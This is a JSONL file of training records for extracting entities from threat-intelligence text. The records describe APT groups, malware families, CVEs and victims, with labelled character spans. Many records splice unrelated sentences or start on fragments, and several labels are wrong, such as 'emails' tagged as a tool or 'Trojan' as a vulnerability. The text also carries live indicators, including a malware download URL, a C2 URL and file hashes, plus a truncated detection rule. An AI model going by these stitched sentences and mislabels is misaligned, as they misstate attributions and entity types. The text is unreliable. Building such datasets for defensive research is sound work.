{"text": "They also changed the final Windows payload significantly from the well-known Fallchill malware used in the previous attack .", "spans": {"SYSTEM: Windows": [[28, 35]], "MALWARE: Fallchill": [[78, 87]]}, "info": {"id": "cyberner_stix_train_002290", "source": "cyberner_stix_train"}}
{"text": "] com ’ was registered via GoDaddy , and uses privacy protection service . Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"ORGANIZATION: GoDaddy": [[27, 34]], "THREAT_ACTOR: Lazarus": [[90, 97]], "TOOL: emails": [[228, 234]], "FILEPATH: Microsoft Word attachment": [[242, 267]], "VULNERABILITY: CVE-2017-0199": [[300, 313]], "MALWARE: ZeroT Trojan": [[328, 340]], "MALWARE: PlugX Remote Access Trojan": [[372, 398]], "MALWARE: RAT": [[401, 404]]}, "info": {"id": "cyberner_stix_train_002291", "source": "cyberner_stix_train"}}
{"text": "Table 2 below lists some of these apps with their respective metadata . To witnesses , the spy appears to be running a program showing videos (e.g VLC) , presenting slides (Prezi) , playing a computer game (Breakout2 , 2048) or even running a fake virus scanner . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"THREAT_ACTOR: spy": [[91, 94]], "TOOL: presenting slides": [[154, 171]], "TOOL: fake virus scanner": [[243, 261]], "THREAT_ACTOR: APT17": [[264, 269]], "THREAT_ACTOR: DeputyDog": [[286, 295]], "ORGANIZATION: FireEye Intelligence": [[333, 353]], "ORGANIZATION: government entities": [[410, 429]], "ORGANIZATION: defense industry": [[436, 452]], "ORGANIZATION: law firms": [[455, 464]], "ORGANIZATION: information technology companies": [[467, 499]], "ORGANIZATION: mining companies": [[502, 518]], "ORGANIZATION: non-government organizations": [[525, 553]]}, "info": {"id": "cyberner_stix_train_002292", "source": "cyberner_stix_train"}}
{"text": "Report_URL : https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf", "spans": {}, "info": {"id": "cyberner_stix_train_002293", "source": "cyberner_stix_train"}}
{"text": "Furthermore , we found that in just the first two weeks of 2017 , there have been more than 120 such spyware variants already built using the same SpyNote Trojan builder as SpyNote RAT and roaming in the wild . The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled .", "spans": {"MALWARE: SpyNote": [[147, 154]], "MALWARE: SpyNote RAT": [[173, 184]], "MALWARE: Silence.Downloader": [[228, 246]], "MALWARE: Cobalt Strike": [[367, 380]]}, "info": {"id": "cyberner_stix_train_002294", "source": "cyberner_stix_train"}}
{"text": "Moreover , they used the same exploit kit Niteris as that in the Corkow case . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) .", "spans": {"VULNERABILITY: kit Niteris": [[38, 49]], "TOOL: Corkow": [[65, 71]], "ORGANIZATION: DHS": [[99, 102]], "ORGANIZATION: Symantec": [[189, 197]], "THREAT_ACTOR: Dragonfly": [[204, 213]], "ORGANIZATION: Dragos": [[222, 228]], "MALWARE: DYMALLOY": [[245, 253]]}, "info": {"id": "cyberner_stix_train_002295", "source": "cyberner_stix_train"}}
{"text": "The strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": {}, "info": {"id": "cyberner_stix_train_002296", "source": "cyberner_stix_train"}}
{"text": "When users try to close the ads , the new functionality causes already downloaded apps to run in a virtual machine . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network . Notestuk ( Backdoor.Notestuk ) ( aka TURNEDUP ) : Malware that can be used to open a backdoor and gather information from a compromised computer . Healthcare has seen increasing email attacks from threat actors for a number of reasons .", "spans": {"THREAT_ACTOR: Lazarus Group": [[158, 171]], "THREAT_ACTOR: group": [[208, 213]], "TOOL: PapaAlfa": [[250, 258]], "MALWARE: Notestuk": [[368, 376]], "MALWARE: Backdoor.Notestuk": [[379, 396]], "MALWARE: TURNEDUP": [[405, 413]], "ORGANIZATION: Healthcare": [[515, 525]], "THREAT_ACTOR: threat actors": [[565, 578]]}, "info": {"id": "cyberner_stix_train_002297", "source": "cyberner_stix_train"}}
{"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": {"THREAT_ACTOR: threat actor": [[53, 65]], "TOOL: mimikatz": [[81, 89]], "THREAT_ACTOR: Barium": [[115, 121]], "ORGANIZATION: employees": [[244, 253], [386, 395]], "ORGANIZATION: social media": [[297, 309]]}, "info": {"id": "cyberner_stix_train_002298", "source": "cyberner_stix_train"}}
{"text": "Most of the network traffic we ’ ve observed is HTTP . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" . Control flow flattening is an obfuscation method where programs do not cleanly flow from beginning to end . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"THREAT_ACTOR: APT38": [[63, 68]], "THREAT_ACTOR: group": [[161, 166]], "THREAT_ACTOR: APT": [[175, 178]], "TOOL: LIGHTWORK": [[317, 326]]}, "info": {"id": "cyberner_stix_train_002299", "source": "cyberner_stix_train"}}
{"text": "] 87:28833 61 [ . The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks . The PowerShell script will first create an instance of the .Net Webclient class and then enumerate the available methods using the GetMethods() call ( highlighted in the image in red ) . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"THREAT_ACTOR: Sofacy group": [[22, 34]], "TOOL: Komplex Trojan": [[47, 61]], "TOOL: PowerShell": [[211, 221]], "FILEPATH: .Net": [[266, 270]], "TOOL: GetMethods()": [[338, 350]], "MALWARE: Royal": [[416, 421]], "MALWARE: BlackSuit": [[426, 435]]}, "info": {"id": "cyberner_stix_train_002300", "source": "cyberner_stix_train"}}
{"text": "The group had obtained the certificates through pre-attack operations before commencing targeted attacks against a number of government and commercial organizations spread across multiple continents over a two-year period .", "spans": {}, "info": {"id": "cyberner_stix_train_002301", "source": "cyberner_stix_train"}}
{"text": "Other samples were also noticed , posing as a client of a ticket-finding service or as an app store for Android . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . This evolution is illustrated across 4 campaigns : one in 2014 , one in 2016 and finally two in 2017 .", "spans": {"SYSTEM: Android": [[104, 111]], "TOOL: Azazel": [[134, 140]], "THREAT_ACTOR: Winnti developers": [[148, 165]]}, "info": {"id": "cyberner_stix_train_002303", "source": "cyberner_stix_train"}}
{"text": "It appears that they introduced Shifu after high-profile law enforcement actions impacted Dridex distribution .", "spans": {"MALWARE: Shifu": [[32, 37]], "MALWARE: Dridex": [[90, 96]]}, "info": {"id": "cyberner_stix_train_002304", "source": "cyberner_stix_train"}}
{"text": "These additional samples behaved similarly to the initial files ;", "spans": {}, "info": {"id": "cyberner_stix_train_002305", "source": "cyberner_stix_train"}}
{"text": "Next , the dropper checks its own parent process for indications that it is running in a sandbox setup . We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host . Winnti : T1032 Standard Cryptographic Protocol ( RC4 , RC5 ) . title : MicroSCADA SCILC Command Execution description : Identification of Events or Host Commands that are related to the MicroSCADA SCILC programming language and specifically command execution author : Mandiant date : 2023/02/27 logsource : product : windows service : security detection : selection : NewProcessName|endswith : - \\scilc.exe CommandLine|contains : -", "spans": {"TOOL: DropIt": [[141, 147]], "THREAT_ACTOR: Winnti": [[273, 279]], "ORGANIZATION: Mandiant": [[541, 549]]}, "info": {"id": "cyberner_stix_train_002306", "source": "cyberner_stix_train"}}
{"text": "When specific versions are discovered that may cause issues for the RAT , it promptly exits .", "spans": {"TOOL: RAT": [[68, 71]]}, "info": {"id": "cyberner_stix_train_002307", "source": "cyberner_stix_train"}}
{"text": "The loader Trojan uses this batch file to run the embedded DLL payload .", "spans": {"VULNERABILITY: Trojan": [[11, 17]], "TOOL: DLL": [[59, 62]]}, "info": {"id": "cyberner_stix_train_002308", "source": "cyberner_stix_train"}}
{"text": "Currently , this only affects Russian banks , but the technology behind Svpeng could easily be used to target other banking applications . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies . The primary attack vectors are watering-hole , spear phishing , and other web-based attacks . KillMilk continues to be a central coordinator for the KillNet Collective , despite claims of leaving the group in mid-2022 .", "spans": {"MALWARE: Svpeng": [[72, 78]], "TOOL: Epic Turla": [[160, 170]], "ORGANIZATION: embassies": [[249, 258]], "THREAT_ACTOR: KillMilk": [[355, 363]]}, "info": {"id": "cyberner_stix_train_002309", "source": "cyberner_stix_train"}}
{"text": "After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": {"TOOL: gsecudmp": [[69, 77]], "TOOL: WCE": [[82, 85]], "THREAT_ACTOR: TG-3390": [[131, 138]]}, "info": {"id": "cyberner_stix_train_002310", "source": "cyberner_stix_train"}}
{"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[43, 60]], "MALWARE: NetTraveler trojan": [[159, 177]]}, "info": {"id": "cyberner_stix_train_002311", "source": "cyberner_stix_train"}}
{"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government .", "spans": {"THREAT_ACTOR: APT28": [[149, 154]]}, "info": {"id": "cyberner_stix_train_002312", "source": "cyberner_stix_train"}}
{"text": "The ActionScript will read each byte of the C2 response and get the hexadecimal value .", "spans": {"TOOL: ActionScript": [[4, 16]], "TOOL: C2": [[44, 46]]}, "info": {"id": "cyberner_stix_train_002313", "source": "cyberner_stix_train"}}
{"text": "We found no similarities to commercial spyware products or to other known spyware variants , which suggests BusyGasper is self-developed and used by a single threat actor . Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL . Activity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom AutoIt FTP Exfiltration tool known as FastUploader from http://192.119.15.36:880/ftp.exe . Techniques include reading SAM and LSA secrets from registries , dumping NTLM hashes , plaintext credentials , and Kerberos keys , as well as dumping the NTDS.dit Active Directory database .", "spans": {"MALWARE: BusyGasper": [[108, 118]], "TOOL: HIDDEN COBRA malware": [[202, 222]], "TOOL: FALLCHILL": [[266, 275]], "MALWARE: Quasar RAT": [[358, 368]], "MALWARE: AutoIt FTP": [[397, 407]], "MALWARE: FastUploader": [[435, 447]], "URL: http://192.119.15.36:880/ftp.exe": [[453, 485]]}, "info": {"id": "cyberner_stix_train_002314", "source": "cyberner_stix_train"}}
{"text": "This code modification marks an unusual departure from the typical AZZY backdoors , with its C&C communication functions moved to an external DLL file .", "spans": {"MALWARE: AZZY backdoors": [[67, 81]], "TOOL: C&C": [[93, 96]], "TOOL: DLL": [[142, 145]]}, "info": {"id": "cyberner_stix_train_002315", "source": "cyberner_stix_train"}}
{"text": "A TrickMo version from January 2020 contained code that checks if the app is running on a rooted device or an emulator to prevent analysis . According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region .", "spans": {"MALWARE: TrickMo": [[2, 9]], "MALWARE: Helminth": [[300, 308]], "MALWARE: ISMDoor": [[315, 322]]}, "info": {"id": "cyberner_stix_train_002316", "source": "cyberner_stix_train"}}
{"text": "This investigation shows multiple similarities to previous attacks attributed to a group called MoleRATs ( aka The Gaza Cybergang ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": {"THREAT_ACTOR: MoleRATs": [[96, 104]], "THREAT_ACTOR: Gaza Cybergang": [[115, 129]]}, "info": {"id": "cyberner_stix_train_002317", "source": "cyberner_stix_train"}}
{"text": "The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality . 360 and Tuisec already identified some Gorgon Group members .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: DLLs": [[28, 32]], "ORGANIZATION: 360": [[109, 112]], "ORGANIZATION: Tuisec": [[117, 123]], "THREAT_ACTOR: Gorgon Group": [[148, 160]], "ORGANIZATION: members": [[161, 168]]}, "info": {"id": "cyberner_stix_train_002318", "source": "cyberner_stix_train"}}
{"text": "The “ idXXXXX.top ” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with “ ejX.com .", "spans": {"MALWARE: Nymaim": [[149, 155]], "DOMAIN: ejX.com": [[194, 201]]}, "info": {"id": "cyberner_stix_train_002319", "source": "cyberner_stix_train"}}
{"text": "cfd77ddc5c1ebb8498c899a68ea75d2616c1c92a0e618113d7c9e5fcc650094b Flash Player com.gzhlubw.pmevdiexmn 3f2ed928789c200e21fd0c2095619a346f75d84f76f1e54a8b3153385850ea63 Target list The actual observed list of mobile apps targeted by Cerberus contains a total of 30 unique applications . The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": {"SYSTEM: Flash Player": [[65, 77]], "MALWARE: Cerberus": [[230, 238]], "THREAT_ACTOR: SectorJ04": [[288, 297]], "MALWARE: Carbanak": [[426, 434]], "MALWARE: Carberp": [[477, 484]]}, "info": {"id": "cyberner_stix_train_002320", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Internet Security for Android detects all three of Triada ’ s modules , so it can save your money from cybercriminals that are behind Triada . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": {"SYSTEM: Kaspersky Internet Security": [[0, 27]], "SYSTEM: Android": [[32, 39]], "MALWARE: Triada": [[61, 67], [144, 150]], "THREAT_ACTOR: groups": [[168, 174]], "VULNERABILITY: CVE-2018-0798": [[188, 201]], "THREAT_ACTOR: APT34": [[413, 418]], "VULNERABILITY: CVE-2017-0199": [[509, 522]], "VULNERABILITY: CVE-2017-11882": [[527, 541]]}, "info": {"id": "cyberner_stix_train_002321", "source": "cyberner_stix_train"}}
{"text": "FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand .", "spans": {"TOOL: FALLCHILL": [[0, 9]], "TOOL: HIDDEN COBRA malware": [[64, 84]], "THREAT_ACTOR: HIDDEN COBRA actors": [[165, 184]], "ORGANIZATION: Unit 42": [[187, 194]], "MALWARE: Bookworm samples": [[254, 270]], "ORGANIZATION: government": [[339, 349]]}, "info": {"id": "cyberner_stix_train_002322", "source": "cyberner_stix_train"}}
{"text": "The red fields are used as the shortcode and keyword for SMS billing . Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . In our analysed sample the “ Loveusd.sys ” driver is installed with the name “ USBHPMS ” . In some cases , the threat actors may have been using compromised organizations to gain access to other victims in supplychaintype attacks .", "spans": {"FILEPATH: Loveusd.sys": [[248, 259]], "FILEPATH: USBHPMS": [[298, 305]], "THREAT_ACTOR: threat actors": [[330, 343]]}, "info": {"id": "cyberner_stix_train_002323", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have not observed TG-4127 use this technique ( using Bitly short links ) to target the U.S. Republican party or the other U.S. presidential candidates whose campaigns were active between mid-March and mid-May : Donald Trump , Bernie Sanders , Ted Cruz , Marco Rubio , and John Kasich .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-4127": [[34, 41]], "TOOL: Bitly": [[69, 74]]}, "info": {"id": "cyberner_stix_train_002324", "source": "cyberner_stix_train"}}
{"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer .", "spans": {"MALWARE: archive": [[14, 21]], "VULNERABILITY: vulnerability": [[82, 95]], "THREAT_ACTOR: threat groups": [[223, 236]], "VULNERABILITY: CVE-2018-0798": [[255, 268]], "MALWARE: RTF weaponizer": [[278, 292]]}, "info": {"id": "cyberner_stix_train_002325", "source": "cyberner_stix_train"}}
{"text": "It was executed from the Telegram messenger download folder :", "spans": {"TOOL: Telegram": [[25, 33]]}, "info": {"id": "cyberner_stix_train_002326", "source": "cyberner_stix_train"}}
{"text": "By adding the previously calculated offset , it can get the address of the mmap function in the target process memory . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives . APT17 : de56eb5046e518e266e67585afa34612 . These new infection vectors rely on Java and IE vulnerabilities to infect the victim ’s PC .", "spans": {"TOOL: Potao": [[156, 161]], "THREAT_ACTOR: APT17": [[227, 232]], "FILEPATH: de56eb5046e518e266e67585afa34612": [[235, 267]], "VULNERABILITY: Java and IE vulnerabilities": [[306, 333]], "ORGANIZATION: the victim ’s PC": [[344, 360]]}, "info": {"id": "cyberner_stix_train_002327", "source": "cyberner_stix_train"}}
{"text": "In this blog , we ’ ll detail the innovative ways in which this ransomware surfaces its ransom note using Android features we haven ’ t seen leveraged by malware before , as well as incorporating an open-source machine learning module designed for context-aware cropping of its ransom note . Unit 42 researchers have been tracking an active campaign . . The IP range for “ PIG GOD ” is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 ’s pet pig .", "spans": {"SYSTEM: Android": [[106, 113]], "ORGANIZATION: Unit 42": [[292, 299]]}, "info": {"id": "cyberner_stix_train_002328", "source": "cyberner_stix_train"}}
{"text": "This shows how the attackers use this backdoor in a surgical way to exclusively attack specific targets .", "spans": {}, "info": {"id": "cyberner_stix_train_002329", "source": "cyberner_stix_train"}}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "ORGANIZATION: Symantec": [[177, 185]], "THREAT_ACTOR: Leafminer": [[212, 221]], "VULNERABILITY: Heartbleed vulnerability": [[238, 262]], "VULNERABILITY: CVE-2014-0160": [[265, 278]]}, "info": {"id": "cyberner_stix_train_002330", "source": "cyberner_stix_train"}}
{"text": "Both of these infection vectors are highly indiscriminate and untargeted when compared to spearphishing , the usual infection vector of choice for the Dukes .", "spans": {"THREAT_ACTOR: Dukes": [[151, 156]]}, "info": {"id": "cyberner_stix_train_002331", "source": "cyberner_stix_train"}}
{"text": "VERSIONING Bread has also leveraged an abuse tactic unique to app stores : versioning . Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above . We used the ZxShell package for version 3.10 ( SHA256 : 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 ).The convenient thing about this is that the CNC panel worked with any version , 3.10 and above . Lowcode automation of processes can make the required actions fast , reliable , and repeatable .", "spans": {"MALWARE: Bread": [[11, 16]], "THREAT_ACTOR: Barium": [[88, 94]], "TOOL: Win32/Barlaiy": [[130, 143]], "TOOL: Win32/PlugX.L": [[174, 187]], "MALWARE: ZxShell": [[264, 271]], "FILEPATH: 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4": [[308, 372]], "TOOL: CNC panel": [[419, 428]]}, "info": {"id": "cyberner_stix_train_002332", "source": "cyberner_stix_train"}}
{"text": "Using this artifact , we were able to pivot and discover another attack campaign using the DealersChoice exploit kit with similar victimology to what we saw in February .", "spans": {"TOOL: DealersChoice": [[91, 104]]}, "info": {"id": "cyberner_stix_train_002333", "source": "cyberner_stix_train"}}
{"text": "It considers the age of the file , its global prevalence , and the presence and validity of a digital signature along with the method of service creation .", "spans": {}, "info": {"id": "cyberner_stix_train_002334", "source": "cyberner_stix_train"}}
{"text": "It was late 2018 when Riltok climbed onto the international stage . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . The decoy document of the 2 last campaigns suggests that the targets are public organisations .", "spans": {"MALWARE: Riltok": [[22, 28]], "THREAT_ACTOR: Zebrocy": [[68, 75]], "VULNERABILITY: 0day exploits": [[200, 213]]}, "info": {"id": "cyberner_stix_train_002335", "source": "cyberner_stix_train"}}
{"text": "This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names .", "spans": {"MALWARE: .lnk file": [[53, 62]], "THREAT_ACTOR: Numbered Panda": [[217, 231]], "ORGANIZATION: security community": [[306, 324]]}, "info": {"id": "cyberner_stix_train_002336", "source": "cyberner_stix_train"}}
{"text": "Never click on unknown links received through ads , SMS messages , emails , or the like . Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group – BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . Group7 : APT15 , Mirage , Vixen Panda , GREF , Playful Dragon , RoyalAPT .", "spans": {"THREAT_ACTOR: Ke3chang": [[193, 201]], "TOOL: BS2005 backdoors": [[210, 226]], "TOOL: RoyalDNS malware": [[259, 275]], "ORGANIZATION: NCC": [[290, 293]], "THREAT_ACTOR: Group7": [[310, 316]], "THREAT_ACTOR: APT15": [[319, 324]], "THREAT_ACTOR: Mirage": [[327, 333]], "THREAT_ACTOR: Vixen Panda": [[336, 347]], "THREAT_ACTOR: GREF": [[350, 354]], "THREAT_ACTOR: Playful Dragon": [[357, 371]], "THREAT_ACTOR: RoyalAPT": [[374, 382]]}, "info": {"id": "cyberner_stix_train_002337", "source": "cyberner_stix_train"}}
{"text": "The new one with the title \" Coralco Archimedes , '' and an older version with the title \" Wolf Intelligence : '' New panel Old panel The new panel name contains \" Coralco '' in its name . In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions . Some samples alternatively use an FGKD.jsp or an FPK.jsp file . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"ORGANIZATION: Kaspersky Lab": [[208, 221]], "ORGANIZATION: GReAT": [[261, 266]], "ORGANIZATION: financial institutions": [[328, 350]], "FILEPATH: FGKD.jsp": [[387, 395]], "FILEPATH: FPK.jsp": [[402, 409]]}, "info": {"id": "cyberner_stix_train_002338", "source": "cyberner_stix_train"}}
{"text": "The threat actors are adept at identifying key data stores and selectively exfiltrating all of the high-value information associated with their goal .", "spans": {}, "info": {"id": "cyberner_stix_train_002339", "source": "cyberner_stix_train"}}
{"text": "The Spark backdoor communicates with the C2 servers over the HTTP protocol .", "spans": {"MALWARE: Spark backdoor": [[4, 18]], "TOOL: C2": [[41, 43]]}, "info": {"id": "cyberner_stix_train_002340", "source": "cyberner_stix_train"}}
{"text": "Discovery T1418 Application Discovery Sends list of installed apps on device . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks .", "spans": {"TOOL: Mimikatz": [[151, 159]], "ORGANIZATION: education": [[217, 226]], "ORGANIZATION: Advanced Threat Research": [[258, 282]], "THREAT_ACTOR: actors": [[357, 363]], "ORGANIZATION: banks": [[381, 386]]}, "info": {"id": "cyberner_stix_train_002341", "source": "cyberner_stix_train"}}
{"text": "Screenshots : captures an image of the current screen via the raw frame buffer . The current campaign is a sharp escalation of detected activity since summer 2017 . Winnti : 44260a1d 2018-08-15 10:59:09 https://dump.gxxservice.com/common/up/up_base.php . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"THREAT_ACTOR: Winnti": [[165, 171]], "URL: https://dump.gxxservice.com/common/up/up_base.php": [[203, 252]]}, "info": {"id": "cyberner_stix_train_002342", "source": "cyberner_stix_train"}}
{"text": "A full description of this zero-day attack can be found in this blog post by Kaspersky Lab 's Vyacheslav Zakorzhevsky . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": {"ORGANIZATION: Kaspersky Lab": [[77, 90]], "MALWARE: Carbanak": [[192, 200]], "ORGANIZATION: financial industry": [[217, 235]], "ORGANIZATION: payment providers": [[246, 263]], "ORGANIZATION: retail industry": [[266, 281]], "ORGANIZATION: PR companies": [[286, 298]]}, "info": {"id": "cyberner_stix_train_002343", "source": "cyberner_stix_train"}}
{"text": "But the categories targeted by this group seem to be broadening with the inclusion of VPN software . In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites . After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of . We propose to reach an agreement and conclude a deal .", "spans": {"SYSTEM: VPN": [[86, 89]], "THREAT_ACTOR: APT37": [[119, 124]], "TOOL: KARAE malware": [[172, 185]]}, "info": {"id": "cyberner_stix_train_002344", "source": "cyberner_stix_train"}}
{"text": "Users are cautioned to research and check reviews before they download apps . Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . The following changes are minor compared with above referenced ones . For connections that occur internally within an enclave ( such as those between a proxy or pivot node and other nodes ) , commonly used protocols are SMB , SSH , or RDP .", "spans": {"ORGANIZATION: Unit 42": [[106, 113]], "THREAT_ACTOR: Gorgon Group": [[171, 183]], "ORGANIZATION: governmental organizations": [[194, 220]], "TOOL: SMB": [[506, 509]], "TOOL: SSH": [[512, 515]], "TOOL: RDP": [[521, 524]]}, "info": {"id": "cyberner_stix_train_002345", "source": "cyberner_stix_train"}}
{"text": "Initiating the MQTT client . Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . This malware has previously been associated with an APT actor that Symantec calls Chafer . In todays world of evolving malware , there are likely a lot of threats antivirus does nt know about .", "spans": {"THREAT_ACTOR: APT33": [[55, 60]], "THREAT_ACTOR: group": [[74, 79]], "ORGANIZATION: Symantec": [[217, 225]], "THREAT_ACTOR: Chafer": [[232, 238]], "MALWARE: malware": [[269, 276]], "ORGANIZATION: antivirus": [[313, 322]]}, "info": {"id": "cyberner_stix_train_002346", "source": "cyberner_stix_train"}}
{"text": "Seemingly random activity patterns in infrastructure deployment and usage , along with the ability to use a wide variety of geographically diverse infrastructure , help the threat actors avoid detection .", "spans": {}, "info": {"id": "cyberner_stix_train_002348", "source": "cyberner_stix_train"}}
{"text": "These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer , keylogger , and remoteshell functionality to a system of interest .", "spans": {}, "info": {"id": "cyberner_stix_train_002349", "source": "cyberner_stix_train"}}
{"text": "By doing so , attackers can easily set up the Trojan to communicate back to them without any need for high-end servers . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . OilRig : IRN2 , HELIX KITTEN , APT34 .", "spans": {"MALWARE: dropper": [[129, 136]], "MALWARE: iassvcs.exe": [[149, 160]], "THREAT_ACTOR: OilRig": [[211, 217]], "THREAT_ACTOR: IRN2": [[220, 224]], "THREAT_ACTOR: HELIX KITTEN": [[227, 239]], "THREAT_ACTOR: APT34": [[242, 247]]}, "info": {"id": "cyberner_stix_train_002350", "source": "cyberner_stix_train"}}
{"text": "They continue to be persistent in their attack campaigns and continue to use similar tooling as in the past .", "spans": {}, "info": {"id": "cyberner_stix_train_002351", "source": "cyberner_stix_train"}}
{"text": "C2 servers are shared by multiple samples . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . The macro contains a virtual machine detection technique based on the serial number of the disks available in the victim environment . This is consistent with the group ’s prior activity scanning and exploiting internet facing servers for initial access .", "spans": {"MALWARE: ThreeDollars delivery document": [[87, 117]], "THREAT_ACTOR: OilRig": [[155, 161]]}, "info": {"id": "cyberner_stix_train_002352", "source": "cyberner_stix_train"}}
{"text": "One of the tools seen above that caught our interest was the Dumpert tool , which is freely available on Outflanknl ’s GitHub repository .", "spans": {"TOOL: Dumpert": [[61, 68]], "TOOL: Outflanknl": [[105, 115]], "TOOL: GitHub": [[119, 125]]}, "info": {"id": "cyberner_stix_train_002353", "source": "cyberner_stix_train"}}
